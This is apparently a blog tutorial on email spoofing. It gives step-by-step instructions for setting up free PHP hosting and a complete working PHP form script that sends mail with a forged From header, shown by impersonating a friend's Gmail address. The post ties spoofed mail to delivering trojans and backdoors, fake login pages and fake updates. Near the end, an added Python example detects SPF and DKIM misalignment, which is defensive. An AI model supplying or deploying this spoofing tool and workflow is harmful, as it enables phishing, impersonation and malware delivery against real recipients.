How hackers impersonate email IDs: Email Spoofing and Phishing Attacks


Email Spoofing

Email spoofing is a type of cyber-attack in which the attacker sends fake emails that appear to have been sent by a legitimate or known person or entity. It is a common tactic for carrying out phishing attacks or spamming. The receiver sees an email address they trust and a name they are familiar with (mostly a friend, a colleague or an organisation they work with) and ends up believing the email and taking the action it asks for.

In my previous blogs, I have mentioned how to create trojans and backdoors. When executed, the user sees normal files, but in the background, the evil code gets executed.


Delivering these files can be an application of email spoofing.


How to Spoof Emails

The initial step relies on information gathered and deciding which email you want to spoof. The emails should impersonate emails from a person or an organisation that the target can trust. It’s all social engineering!


If you are impersonating a friend, you can tell the target person to open an image. If you impersonate a support member from an organisation or admin of a website, you can tell the target to log in using a fake login page or tell the target to install an update.


Take a scenario

Suppose I want to impersonate the target person’s friend, whose name is Aakash, and I know that his email id is aakash@gmail.com. I will try to send a fake email to my target impersonating his email id.

It is really easy. Go to Google and search for spoof emails online.


You will find a lot of websites providing this service. The problem with sending emails from these websites is that a lot of these emails will end up in the spam folder of the target person and not in the inbox. The reason is that these websites are public and a lot of people use them for spamming, so mail servers like Google, Yahoo, etc. mark emails received from these servers as spam.

To bypass this you can either use your own web-hosting plan or you can sign up for a free web-hosting plan and use that for sending fake emails.


Using a web hosting plan

The requirement for this method is that the web-hosting provider should support PHP files, so static web hosting won’t work. You can also use your own domain with the web-hosting provider, but for this blog I will use a free web-hosting provider. I will be using https://www.000webhost.com/.

This is a paid service but I will be using their free plan for this blog. Go to the above link, scroll down and click on Free Sign Up under Free Web Hosting.


After signing up, click on the Create new site button on the top right.

A pop-up will appear where you would need to add your website name and password. Now remember both of these.

Next open https://files.000webhost.com/ in the same browser where you are logged into the webhost account. You may or may not need to enter the above credentials. If you are prompted, enter the above credentials and proceed. A page similar to the one shown below should be visible.


Open the folder named public_html by double-clicking it. Save the following script in a file named send.php and upload it to the folder named public_html.

<?php
if (isset($_POST["send"])) {
 $to = $_POST["to"];
 $subject = $_POST["subject"];
 $message = $_POST["message"];
 $from = $_POST["from"];
 $name = $_POST["name"];
 if (!(filter_var($to, FILTER_VALIDATE_EMAIL) && filter_var($from, FILTER_VALIDATE_EMAIL))) {
  echo "Email address inputs invalid";
  die();
 }
 $header = "From: " .  $name . " <" . $from . ">\r\nMIME-Version: 1.0\r\nContent-type: text/html\r\n";
 $retval = mail($to, $subject, $message, $header);
 if ($retval) {
  echo "Email sent.";
 } else {
  echo "Email did not send. Error: " . $retval;
 }
} else {
 echo 
 '<html>
  <head>
   <style> 
    input[type=submit] {
      background-color: #4CAF50;
      border: none;
      color: white;
      padding: 14px 32px;
      text-decoration: none;
      margin: 4px 2px;
      cursor: pointer;
      font-size: 16px;
    }
   </style>
  </head>
  <body>
<h2>Spoof Email</h2>
<form action="/send.php" method="post" id="emailform">
     <label for="to">To:</label><br>
     <input type="text" id="to" name="to"><br><br>
     <label for="from">From:</label><br>
     <input type="text" id="from" name="from"><br><br>
     <label for="name">Name (optional):</label><br>
     <input type="text" id="name" name="name"><br><br>
     <label for="subject">Subject:</label><br>
     <input type="text" id="subject" name="subject"><br><br>
     <label for="message">Message [HTML is supported]:</label><br>
     <textarea rows="6" cols="50" name="message" form="emailform"></textarea><br><br>
     <input type="hidden" id="send" name="send" value="true">
     <input type="submit" value="Submit">
   </form>
<p>An e-mail will be sent to the desired target with a spoofed From header when you click Submit.</p>
</body>
 </html>' ;
}
?>

Great, we are done! Now it’s time for some action. Go to the homepage of 000webhost. Your site will appear in a card. Click on the URL.


I need to append send.php to the end of the URL and run it. So for me the URL will be https://test-xyz-infinee.000webhostapp.com/send.php


A form similar to the one shown below will appear.


Since I was impersonating Aakash whose email id is aakash@gmail.com , I will fill in the details accordingly.

And finally click on submit and poof! Email Sent

On checking my email (target_email), I actually received an email from the email address aakash@gmail.com . I also got a notification on my iPhone and it looks pretty convincing and authentic!


Attaching screenshots of how the emails look on the browser when opened.

The name appears correctly. Even the email id appears correctly.

The only way to tell that it is not original and is a phishing email is the text written after "via", and that too only if the email is viewed in a web browser.
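Gmail shows the "via" label when the domain that actually sent the message does not match the domain in the From: address, and the same comparison can be automated on the receiving side. The following is an added example, not part of the original post: it reads the Authentication-Results header of a received message and reports whether SPF or DKIM is aligned with the visible From: domain. The sample message, the hostnames webhost.example and receiver.example and the function names are constructed for illustration, and comparing the last two domain labels is a simplification of the Public Suffix List lookup that DMARC uses.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: visible From is gmail.com, but the message was
# submitted through a web host (hostnames are placeholders).
SAMPLE = """\
Return-Path: <app@webhost.example>
Authentication-Results: mx.receiver.example;
 spf=pass smtp.mailfrom=app@webhost.example;
 dkim=none;
 dmarc=fail header.from=gmail.com
From: Aakash <aakash@gmail.com>
To: target@receiver.example
Subject: Hello

hi
"""

def org_domain(value):
    """Last two labels of a domain or address (no Public Suffix List)."""
    host = value.rsplit("@", 1)[-1].strip("<> ").lower()
    return ".".join(host.split(".")[-2:])

def check_alignment(raw):
    """Return (aligned, reasons) using DMARC-style relaxed alignment."""
    msg = message_from_string(raw)
    from_dom = org_domain(parseaddr(msg.get("From", ""))[1])
    results = " ".join(msg.get_all("Authentication-Results") or [])
    results = re.sub(r"\s+", " ", results)  # unfold continuation lines
    reasons = []
    # SPF vouches for the envelope sender, not the From: header the user sees.
    spf = re.search(r"\bspf=(\w+)[^;]*?smtp\.mailfrom=([^\s;]+)", results)
    spf_ok = bool(spf) and spf.group(1) == "pass" \
        and org_domain(spf.group(2)) == from_dom
    if not spf_ok:
        reasons.append("SPF not aligned with From domain")
    # A DKIM pass only counts if the signing domain (d=) matches From:.
    dkim = re.findall(r"\bdkim=(\w+)[^;]*?header\.d=([^\s;]+)", results)
    dkim_ok = any(r == "pass" and org_domain(d) == from_dom for r, d in dkim)
    if not dkim_ok:
        reasons.append("no aligned DKIM signature")
    rpath = org_domain(parseaddr(msg.get("Return-Path", ""))[1])
    if rpath and rpath != from_dom:
        reasons.append(f"Return-Path {rpath} differs from From {from_dom}")
    return (spf_ok or dkim_ok), reasons

if __name__ == "__main__":
    print(check_alignment(SAMPLE))
```

Only trust an Authentication-Results header that your own receiving mail server added, since a sender can insert a forged one further down the header block.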


This blog was originally published in the personal blog website of Gourav : https://gourav-dhar.com
